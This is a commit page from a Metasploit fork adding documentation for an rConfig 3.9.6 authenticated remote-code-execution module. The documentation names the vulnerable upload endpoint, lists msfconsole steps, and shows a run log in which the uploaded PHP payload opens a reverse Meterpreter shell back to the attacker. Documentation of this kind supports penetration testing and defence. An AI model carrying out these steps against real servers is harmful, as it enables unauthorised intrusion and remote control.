adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

initial commit

Browse Source
This commit is contained in:
Yann Castel
2021-06-17 15:15:59 +02:00
parent e7983c3b6f
commit 0fda6b348d
2 changed files with 221 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/rconfig_authenticated_rce.md
+57
View File
@@ -0,0 +1,57 @@
## Vulnerable Application
### Description
This module allows an attacker with a privileged rConfig account to start a reverse shell due to an
arbitrary file upload vulnerability in `/lib/crud/vendors.crud.php`. Then, the uploaded payload can be
triggered by a call to `images/vendor/<payload_file>.php`
### Installation
Vulnerable versions of rConfig can be downloaded from [here](https://www.cacti.net/downloads/). Then,
help yourself with [this](https://help.rconfig.com/gettingstarted/installation) installation guide.
You can also use this [docker file](https://hub.docker.com/r/libyerman/rconfig)
(as long as it is not updated and remains a 3.9.6 version of rConfig)
## Verification Steps
List the steps needed to make sure this thing works
1. Start `msfconsole`
2. `use exploit/linux/http/rconfig_authenticated_rce`
3. `set USERNAME <admin_username>`
4. `set PASSWORD <admin_password>`
5. `set TARGETURI <base_path_rconfig>` if the base path of rConfig web server is different from `/`
6. `check` to check if the targeted rConfig server is vulnerable
7. `run` the module to exploit the vulnerability and start a reverse shell
## Options
### USERNAME
Set the USERNAME of your admin account.
### PASSWORD
Set the PASSWORD of your admin account.
## Scenarios
This module was successfully tested on CentOS 7 with rConfig 3.9.6. See the following output :
```
msf6 exploit(rconfig_authenticated_rce) > run
[*] Started reverse TCP handler on X.X.X.X:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] Version 3.9.6 of rConfig found !
[+] The target is vulnerable.
[+] We successfully logged in !
[*] Uploading file 'uaxsv.php' containing the payload...
[*] Triggering the payload ...
[*] Sending stage (39282 bytes) to Y.Y.Y.Y
[*] Meterpreter session 13 opened (X.X.X.X:4444 -> Y.Y.Y.Y:38310) at 2021-06-17 14:41:00 +0200
meterpreter > getuid
Server username: apache (48)
```